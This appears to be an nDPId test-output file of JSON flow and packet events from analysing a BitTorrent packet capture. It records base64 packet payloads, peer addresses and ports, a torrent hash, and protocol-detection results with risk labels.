-01344{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1455469967465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":624,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":624,"pkt_l4_len":590,"thread_ts_msec":1455469967465,"pkt":"xCwDBkn+LFbcjDU0CABFAAJiKFpAAHUG7uJSOthzwKgBA5Whzpinc5NTxcwDkoAZ\/SDtQgAAAQEICgCEQ0UZ2\/AZNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTllMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI4ODhlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/9\/b\/v\/\/\/\/\/\/\/\/\/+\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/+\/3\/9\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/++\/\/\/\/\/\/\/\/\/3\/\/\/9\/\/\/\/f\/9\/\/\/\/\/9\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/7\/\/\/\/+AAAAABQQAAAJlAAAABQQAAALYAAAABQQAAAB+AAAABQQAAACJAAAABQQAAAE5AAAABQQAAAARAAAABQQAAAK+AAAABQQAAAMvAAAABQQAAAKkAAAABQQAAAGlAAAABQQAAADmAAAABQQAAAHxAAAABQQAAANdAAAABQQAAABXAAAABQQAAADTAAAABQQAAANxAAAABQQAAAJrAAAABQQAAACTAAAABQQAAAFjAAAABQQAAALoAAAABQQAAACGAAAABQQAAAG8AAAABQQAAAMMAAAABQQAAAGu"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1455469967550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967550,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4KZJAAEAGAADAqAEDUjlhU86Xz5EMkOfxIylUooAY70J1ogAAAQEIChnb8UUAFHnUE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhJMcBHQL4ndrvA="} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1455469967858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469967858,"pkt":"xCwDBkn+LFbcjDU0CABFAACkC49AAHcGgo1SOWFTwKgBA8+RzpcjKVSiDJDoNYAYAQJHBAAAAQEICgAUefwZ2\/FFE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wornNx4q0nl1XkqQAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTNlMQ=="} -01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1455469968002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469968002,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDC5FAAHcGgOxSOWFTwKgBA8+RzpcjKVUSDJDoNYAZAQLSoQAAAQEICgAUef4Z2\/FFOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUzMTM3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg4N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/93\/\/\/\/\/\/\/\/\/\/\/+f\/\/\/\/\/7\/\/\/3\/\/\/\/\/\/\/\/v\/\/\/v\/+\/\/3\/\/\/\/\/9\/\/\/\/\/\/1\/\/\/f\/\/v9\/\/\/\/\/\/\/\/\/91\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAtIAAAAFBAAAAngAAAAFBAAAAeYAAAAFBAAAAUUAAAAFBAAAAskAAAAFBAAAAGcAAAAFBAAAArYAAAAFBAAAAVgAAAAFBAAAAQEAAAAFBAAAAjMAAAAFBAAAAqAAAAAFBAAAAMoAAAAFBAAAAxIAAAAFBAAAAlIAAAAFBAAAAc8AAAAFBAAAAkMAAAAFBAAAAagAAAAFBAAAAhsAAAAFBAAAAzgAAAAFBAAAAacAAAAFBAAAAxQAAAAFBAAAAw4AAAAFBAAAAVwAAAAFBAAAAqI="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1455469969259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969259,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4K5tAAEAGAADAqAEDU9i48c6fyNXli2jySWt7B4AYK\/LO3wAAAQEIChnb9+x4G0bsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjvi3q9Fc8jVIrp0="} -00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1455469969318,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"thread_ts_msec":1455469969318,"pkt":"xCwDBkn+LFbcjDU0CABFYACGozdAADIG1mVT2LjxwKgBA8jVzp9Ja3sH5YtpNoAYECl7XAAAAQEICngbRx8Z2\/fsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qniMLxLorRFP2hZAAAAEAFABkMTplaTBlNA=="} -01379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1455469969391,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":648,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":648,"pkt_l4_len":614,"thread_ts_msec":1455469969391,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ6SOJAADIGLsdT2LjxwKgBA8jVzp9Ja3tZ5YtpNoAYECl87wAAAQEICngbR0YZ2\/gmOmlwdjQ0OlPYuPE0OmlwdjYxNjr+gAAAAAAAAOoGiP\/+zfQTMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk1MTQxM2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAxLjguODI6eXBpNTI4OTVlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/3\/\/\/\/\/7\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/b\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/9\/\/\/\/7\/\/\/\/\/\/\/99\/\/\/\/\/\/3\/\/97\/v\/\/\/\/\/9\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/X\/\/\/\/9\/\/+AAAAABQQAAAG6AAAABQQAAAITAAAABQQAAAHTAAAABQQAAAA1AAAABQQAAAAQAAAABQQAAAHdAAAABQQAAAMaAAAABQQAAAE+AAAABQQAAANHAAAABQQAAAN+AAAABQQAAAIEAAAABQQAAAHOAAAABQQAAAGSAAAABQQAAAC8AAAABQQAAANcAAAABQQAAAGMAAAABQQAAABAAAAABQQAAAFbAAAABQQAAAEBAAAABQQAAACdAAAABQQAAADUAAAABQQAAAC\/AAAABQQAAAKPAAAABQQAAANe"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4XbBAAEAGAADAqAEDTzXkAs6gOSOymifHI+P1WoAYmwf1TQAAAQEIChnb+J8AAH2QE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjqb8v2rPEXkzqd0="} -00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4duZAAEAGAADAqAEDeD4h8c6emaQxnKbPGdPY9oAYmwdcRQAAAQEIChnb+J8AQ+diE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsdMZTLXvd5m7DE="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1455469969680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1455469969680,"pkt":"xCwDBkn+LFbcjDU0CABFAACJEvpAAHcG+5FPNeQCwKgBAzkjzqAj4\/VaspooC4AYAQLEvgAAAQEICgAAfaoZ2\/ifE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wovPx6i8m4ev0sHgAAADnFABkMTplaTBlNDppcA=="} -01342{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1455469969689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":620,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":620,"pkt_l4_len":586,"thread_ts_msec":1455469969689,"pkt":"xCwDBkn+LFbcjDU0CABFAAJeEvxAAHcG+bpPNeQCwKgBAzkjzqAj4\/WvspooC4AZAQKoaAAAAQEICgAAfaoZ2\/ifdjQ0Ok815AIxMjpjb21wbGV0ZV9hZ29pNmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTE0NjI3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5NmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/9\/7\/\/\/\/\/fv\/\/\/\/\/\/f\/\/\/3\/\/\/\/\/9\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/v\/+\/\/\/\/9\/\/\/\/\/\/\/\/+\/\/\/9\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/f\/\/3\/P\/\/\/\/\/4AAAAAFBAAAA2sAAAAFBAAAAW0AAAAFBAAAAlYAAAAFBAAAAdEAAAAFBAAAAPQAAAAFBAAAAtIAAAAFBAAAAMsAAAAFBAAAAyUAAAAFBAAAAKMAAAAFBAAAAMQAAAAFBAAAAcEAAAAFBAAAAtMAAAAFBAAAAiUAAAAFBAAAAEYAAAAFBAAAAT8AAAAFBAAAAe4AAAAFBAAAAjwAAAAFBAAAAvgAAAAFBAAAA2oAAAAFBAAAA2AAAAAFBAAAAJgAAAAFBAAAATQAAAAFBAAAAQ4AAAAFBAAAA0w="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1455469970233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970233,"pkt":"LFbcjDU0xCwDBkn+CABFAAB45PBAAEAGAADAqAEDlxpfHs6hWJHZNtVIfkyTS4AYJnO4TgAAAQEIChnb+7IRKfdEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjCQUdTBqR8vIZE="} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1455469970293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469970293,"pkt":"xCwDBkn+LFbcjDU0CABFAACkCYZAAHIGRuqXGl8ewKgBA1iRzqF+TJNL2TbVjIAYHVxFKAAAAQEIChEp94AZ2\/uyE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coXQqpAS87AVXIDwAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVfYWdvaTFlMQ=="} -01305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1455469970357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469970357,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDCYlAAHIGRUiXGl8ewKgBA1iRzqF+TJO72TbVjIAYHVwHogAAAQEIChEp97wZ2\/vsOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTIyNjczZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2\/3\/\/\/\/r\/\/\/\/\/9\/3\/\/\/\/\/9\/+\/\/+\/\/+\/\/\/\/f\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/+\/\/\/+\/v\/\/\/7\/\/7\/\/9\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAUAAAAAFBAAAAboAAAAFBAAAArkAAAAFBAAAA0EAAAAFBAAAAD0AAAAFBAAAAvsAAAAFBAAAAPwAAAAFBAAAAPMAAAAFBAAAAqcAAAAFBAAAAX0AAAAFBAAAAY8AAAAFBAAAAaEAAAAFBAAAAo0AAAAFBAAAAPAAAAAFBAAAAegAAAAFBAAAAjYAAAAFBAAAARsAAAAFBAAAAm0AAAAFBAAAAoUAAAAFBAAAAUoAAAAFBAAAARkAAAAFBAAAAswAAAAFBAAAAiYAAAAFBAAAAXA="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970452,"pkt":"LFbcjDU0xCwDBkn+CABFAAB41kZAAEAGAADAqAEDTzeBFs6dL0HtOa3YPhLeWYAYVhCSYwAAAQEIChnb\/IcCXeBSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjpi3Emqkm5uHs80="} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 